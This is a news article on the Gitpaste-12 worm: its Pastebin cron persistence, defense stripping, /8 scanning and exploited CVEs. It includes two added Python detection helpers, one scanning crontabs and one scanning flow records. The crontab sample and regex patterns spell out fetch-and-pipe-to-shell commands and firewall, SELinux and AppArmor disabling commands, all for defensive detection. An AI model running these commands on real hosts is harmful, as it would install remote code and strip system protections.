Gitpaste-12 Malware via GitHub & Pastebin Attacks Linux Servers and IoT Devices

Cybersecurity researchers have detected a new worm targeting Linux-based x86 servers and Linux-based internet of things (IoT) devices. The malware has been named Gitpaste-12 because it uses GitHub and Pastebin to host its components and has at least 12 known attack modules for compromising systems.

Juniper Threat Labs detected the first Gitpaste-12 attacks on October 15, 2020, and reported both the Pastebin URL and the git repository used by the worm. The git repository was closed on October 30, 2020.

The worm spreads automatically: once inside an organization it can move laterally between hosts, and infected hosts in turn attack other networks across the internet. Its tampering with infected systems also degrades their reliability.


The first stage of the attack is the initial compromise of a system. Gitpaste-12 has 12 known attack modules for this, with more under development.

The worm uses known exploits to compromise systems and also attempts to brute-force passwords.

Once a system is compromised, the malware sets up a cron job that downloads a script from Pastebin; that script calls the same script again and executes it every minute. This gives the operators a simple way to push updates to the botnet: changing the Pastebin content changes what every infected host runs a minute later.

Before the cron job does anything else, it prepares the environment by stripping the system of its defenses, including firewall rules, SELinux, AppArmor, and common attack-prevention and monitoring software.
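The two paragraphs above describe a persistence loop that is easy to triage for on a Linux host: an every-minute cron entry that fetches a script from a paste or raw-hosting site and pipes it straight into a shell, next to commands that turn off the firewall, SELinux or AppArmor. The following Python helper is an added example, not code from Juniper Threat Labs or this article; the hostnames, the list of defense-disabling commands and the sample crontab are assumptions constructed for illustration.

```python
"""Triage helper for the persistence pattern described above.

Added example, not code from Juniper Threat Labs or the article. It scans
crontab text (user-crontab format: five schedule fields, then the command)
for three traits: a job that runs every minute, a job that fetches a script
from a paste/raw-hosting site and pipes it to a shell, and commands that
strip host defenses. The host list, the defense-kill patterns and the
sample crontab at the bottom are assumptions constructed for illustration.
"""
import re

# Hosting services named in the article; the raw-content hostname is an
# assumption about how such URLs usually look.
PASTE_HOSTS = ("pastebin.com", "raw.githubusercontent.com", "github.com")

# Typical commands for tearing down firewall / SELinux / AppArmor. Assumed;
# the article does not list the exact commands the payload runs.
DEFENSE_KILL_PATTERNS = [
    r"\biptables\s+(-F|--flush)\b",
    r"\bsetenforce\s+0\b",
    r"\bsystemctl\s+(stop|disable)\s+(apparmor|firewalld|ufw)\b",
    r"\bservice\s+(apparmor|firewalld|ufw)\s+stop\b",
    r"\bufw\s+disable\b",
]

# curl/wget ... <paste host>... | sh  (or bash), within one pipeline segment
DOWNLOAD_AND_EXEC = re.compile(
    r"\b(curl|wget)\b[^|;]*\b(" + "|".join(map(re.escape, PASTE_HOSTS)) + r")\S*"
    r"[^|;]*\|\s*(ba)?sh\b"
)

EVERY_MINUTE = re.compile(r"^(\*|\*/1)( \*){4}$")


def parse_crontab(text):
    """Yield (schedule, command) pairs, skipping comments and VAR=value lines."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):                 # @reboot, @hourly, ...
            parts = line.split(None, 1)
            if len(parts) == 2:
                yield parts[0], parts[1]
            continue
        parts = line.split(None, 5)
        if len(parts) == 6:
            yield " ".join(parts[:5]), parts[5]


def analyze_crontab(text):
    """Return a list of (reasons, schedule, command) for suspicious entries."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        if EVERY_MINUTE.match(schedule):
            reasons.append("runs every minute")
        if DOWNLOAD_AND_EXEC.search(command):
            reasons.append("downloads from paste/raw host and pipes to shell")
        if any(re.search(p, command) for p in DEFENSE_KILL_PATTERNS):
            reasons.append("disables host defenses")
        if reasons:
            findings.append((reasons, schedule, command))
    return findings


# Constructed sample: three malicious-looking lines and one benign job.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow command
* * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE | sh
*/5 * * * * wget -qO- https://raw.githubusercontent.com/user/repo/master/s.sh | bash
@reboot iptables -F; setenforce 0; systemctl stop apparmor
0 3 * * * /usr/bin/certbot renew --quiet
"""

if __name__ == "__main__":
    for reasons, schedule, command in analyze_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(reasons)}] {schedule} {command}")
```

In practice you would feed it the output of `crontab -l` for each user plus the files under /etc/cron.d (which carry an extra user field, so strip that column first). The download-and-execute check is the strongest of the three signals; an every-minute schedule on its own is common for legitimate monitoring agents.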

Worming Ability

Gitpaste-12 also includes a script that launches attacks against other machines; its purpose is to replicate and spread as widely as possible.

To choose targets, the worm picks a random /8 CIDR block and attempts to attack every address within that range.

Exploits of Gitpaste-12

Gitpaste-12 uses the following exploits:

  • CVE-2017-14135: Webadmin plugin for OpenDreambox
  • CVE-2020-24217: HiSilicon-based IPTV/H.264/H.265 video encoders
  • CVE-2017-5638: Apache Struts
  • CVE-2020-10987: Tenda router
  • CVE-2014-8361: Miniigd SOAP service in Realtek SDK
  • CVE-2020-15893: UPnP in D-Link routers
  • CVE-2013-5948: ASUS routers
  • EDB-ID 48225: Netlink GPON router
  • EDB-ID 40500: AVTECH IP camera
  • CVE-2019-10758: MongoDB
  • CVE-2017-17215: Huawei router

Worms are troublesome precisely because they spread without any further action by the attacker: Gitpaste-12 moves laterally within an institution and uses compromised hosts to attack other networks across the internet. It also gives the threat actors reverse shells on infected machines.

Security researchers also observed that some infected systems have TCP ports 30004 and 30005 open, listening for shell commands.
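Both the propagation behaviour described under "Worming Ability" (one host working through a randomly chosen /8) and the listener ports noted just above are visible from the network side. The Python below is an added example, not code from Juniper Threat Labs or this article: it runs over constructed connection records in a minimal "src dst dport" format (an assumption about what a flow export or firewall log reduces to), flags any source that reaches many distinct destinations inside a single /8, and lists hosts that received traffic on TCP 30004 or 30005. The threshold of 50 destinations and the sample records are assumptions.

```python
"""Network-side checks for the two behaviours described above.

Added example, not code from Juniper Threat Labs or the article. It runs over
constructed connection records in a minimal "src dst dport" text format, an
assumption about what a flow export or firewall log reduces to, and flags
(1) a source that reaches many distinct destinations inside one /8, the
shape of a worm picking a random /8 to sweep, and (2) hosts that received
traffic on TCP 30004 or 30005, the shell-listener ports named above.
"""
import ipaddress
from collections import defaultdict

SHELL_PORTS = {30004, 30005}    # ports reported in the article
SWEEP_THRESHOLD = 50            # distinct destinations in one /8 (assumed tuning)


def parse_flows(text):
    """Parse 'src dst dport' lines into (src, dst, dport); skip blanks/comments."""
    flows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, dport = line.split()
        flows.append((ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport)))
    return flows


def detect_sweeps(flows, threshold=SWEEP_THRESHOLD):
    """Map each sweeping source to (the /8 it is sweeping, distinct destinations).

    Only the busiest /8 per source is considered, since the worm works one
    randomly chosen /8 at a time.
    """
    per_src = defaultdict(lambda: defaultdict(set))
    for src, dst, _dport in flows:
        if dst.version != 4:
            continue
        slash8 = ipaddress.ip_network((int(dst) & 0xFF000000, 8))
        per_src[src][slash8].add(dst)
    hits = {}
    for src, nets in per_src.items():
        net, dsts = max(nets.items(), key=lambda kv: len(kv[1]))
        if len(dsts) >= threshold:
            hits[str(src)] = (str(net), len(dsts))
    return hits


def detect_shell_ports(flows):
    """Sorted destination hosts that received traffic on the reported ports."""
    return sorted({str(dst) for _src, dst, dport in flows if dport in SHELL_PORTS})


def build_sample():
    """Constructed records, not captured traffic."""
    lines = ["# src dst dport"]
    # One internal host touching 60 addresses spread across 45.0.0.0/8
    lines += [f"10.0.0.5 45.{i}.7.1 80" for i in range(60)]
    # An ordinary host reaching a couple of web services
    lines += ["10.0.0.9 93.184.216.34 443", "10.0.0.9 151.101.1.69 443"]
    # Inbound hits on the reported shell ports
    lines += ["203.0.113.77 10.0.0.5 30004", "203.0.113.77 10.0.0.12 30005"]
    return "\n".join(lines)


if __name__ == "__main__":
    flows = parse_flows(build_sample())
    for src, (net, n) in detect_sweeps(flows).items():
        print(f"{src} swept {n} hosts in {net}")
    print("shell-port destinations:", detect_shell_ports(flows))
```

The sweep check deliberately counts distinct destinations rather than connection attempts, so a host that legitimately hammers one server is not flagged, while a scanner that touches one address per /16 across a /8 is. The port check is only a lead: confirm on the host with `ss -ltnp` that something is actually bound to 30004 or 30005 before treating it as an infection.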


Balaji N

BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
